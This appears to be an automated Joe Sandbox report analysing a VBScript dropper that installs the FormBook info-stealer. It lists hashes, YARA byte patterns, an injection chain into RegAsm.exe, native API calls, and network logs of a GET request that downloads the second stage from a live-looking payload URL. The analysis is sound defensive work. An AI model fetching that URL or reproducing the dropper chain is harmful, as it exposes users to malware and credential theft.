Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KjFT0qPTo4.vbs

Overview

General Information

Sample name:KjFT0qPTo4.vbs
renamed because original name is a hash value
Original sample name:437d16ac6fb62c138841e2ddb216dca0.vbs
Analysis ID:1530695
MD5:437d16ac6fb62c138841e2ddb216dca0
SHA1:0c74d149fbd1f4f1a20ba1f962564d02a88d184f
SHA256:2b18564d817f6070f7cdb7f29dc8ba06a96772c7ce0ea72e74c944b089bf7df4
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • wscript.exe (PID: 3232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • temp_executable.exe (PID: 3316 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 12E3B467C52A663A7B6F61AF61B63A11)
      • RegAsm.exe (PID: 3396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c1b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      SourceRuleDescriptionAuthorStrings
      3.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2e493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16542:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          System Summary

          barindex
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", ProcessId: 3232, ProcessName: wscript.exe
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", ProcessId: 3232, ProcessName: wscript.exe
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeAvira: detection malicious, Label: TR/Dropper.Gen
          Source: transfer.adttemp.com.brVirustotal: Detection: 5%Perma Link
          Source: http://transfer.adttemp.com.brVirustotal: Detection: 5%Perma Link
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: Binary string: VCBJER234.pdb source: wscript.exe, 00000000.00000003.371603253.0000000003ED3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371785671.000000000476B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371651218.0000000003BCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371908468.0000000004410000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.364263905.00000000012F2000.00000020.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr
          Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

          Networking

          barindex
          Source: Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file
          Source: global trafficHTTP traffic detected: GET /hUkry/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /hUkry/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: transfer.adttemp.com.br
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: temp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.br
          Source: temp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.brX
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br
          Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txt
          Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txtX~
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.22:49163 version: TLS 1.2

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgIDJump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042C563 NtClose,3_2_0042C563
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F07AC NtCreateMutant,LdrInitializeThunk,3_2_022F07AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,3_2_022EFAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,3_2_022EFB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EF9F0 NtClose,LdrInitializeThunk,3_2_022EF9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,3_2_022EFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F0060 NtQuerySection,3_2_022F0060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F0078 NtResumeThread,3_2_022F0078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F0048 NtProtectVirtualMemory,3_2_022F0048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F00C4 NtCreateFile,3_2_022F00C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F10D0 NtOpenProcessToken,3_2_022F10D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F010C NtOpenDirectoryObject,3_2_022F010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F1148 NtOpenThread,3_2_022F1148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F01D4 NtSetValueKey,3_2_022F01D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFA20 NtQueryInformationFile,3_2_022EFA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFA50 NtEnumerateValueKey,3_2_022EFA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFAB8 NtQueryValueKey,3_2_022EFAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFAD0 NtAllocateVirtualMemory,3_2_022EFAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFB50 NtCreateKey,3_2_022EFB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFBB8 NtQueryInformationToken,3_2_022EFBB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFBE8 NtQueryVirtualMemory,3_2_022EFBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EF8CC NtWaitForSingleObject,3_2_022EF8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EF938 NtWriteFile,3_2_022EF938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F1930 NtSetContextThread,3_2_022F1930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EF900 NtReadFile,3_2_022EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFE24 NtWriteVirtualMemory,3_2_022EFE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFEA0 NtReadVirtualMemory,3_2_022EFEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFED0 NtAdjustPrivilegesToken,3_2_022EFED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFF34 NtQueueApcThread,3_2_022EFF34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFFB4 NtCreateSection,3_2_022EFFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFFFC NtCreateProcessEx,3_2_022EFFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFC30 NtOpenProcess,3_2_022EFC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFC60 NtMapViewOfSection,3_2_022EFC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFC48 NtSetInformationFile,3_2_022EFC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F0C40 NtGetContextThread,3_2_022F0C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFC90 NtUnmapViewOfSection,3_2_022EFC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFD5C NtEnumerateKey,3_2_022EFD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022EFD8C NtDelayExecution,3_2_022EFD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022F1D80 NtSuspendThread,3_2_022F1D80
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_002C99702_2_002C9970
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_002C81482_2_002C8148
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_002C1A602_2_002C1A60
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 2_2_002C16D02_2_002C16D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004023503_2_00402350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042EB833_2_0042EB83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FCFB3_2_0040FCFB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004044863_2_00404486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FD033_2_0040FD03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00402E603_2_00402E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004166B33_2_004166B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FF233_2_0040FF23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040DFA33_2_0040DFA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023A12383_2_023A1238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022FE2E93_2_022FE2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023023053_2_02302305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0234A37B3_2_0234A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023073533_2_02307353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023A63BF3_2_023A63BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022FF3CF3_2_022FF3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023263DB3_2_023263DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0232D0053_2_0232D005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0231905A3_2_0231905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023030403_2_02303040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022FE0C63_2_022FE0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0234A6343_2_0234A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023A26223_2_023A2622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023046803_2_02304680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0230E6C13_2_0230E6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0230C7BC3_2_0230C7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0238579A3_2_0238579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023357C33_2_023357C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0233D47D3_2_0233D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023354853_2_02335485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023114893_2_02311489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0230351F3_2_0230351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023465403_2_02346540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0231C5F03_2_0231C5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023B3A833_2_023B3A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02327B003_2_02327B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023ACBA43_2_023ACBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0238DBDA3_2_0238DBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_022FFBD73_2_022FFBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0232286D3_2_0232286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0230C85C3_2_0230C85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0239F8EE3_2_0239F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023859553_2_02385955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023029B23_2_023029B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023A098E3_2_023A098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_023169FE3_2_023169FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02332E2F3_2_02332E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0231EE4C3_2_0231EE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02310F3F3_2_02310F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0232DF7C3_2_0232DF7C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02330D3B3_2_02330D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0230CD5B3_2_0230CD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0239FDDD3_2_0239FDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02343F92 appears 108 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0234373B appears 238 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 022FE2A8 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0236F970 appears 81 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 022FDF5C appears 118 times
          Source: KjFT0qPTo4.vbsInitial sample: Strings found which are bigger than 50
          Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
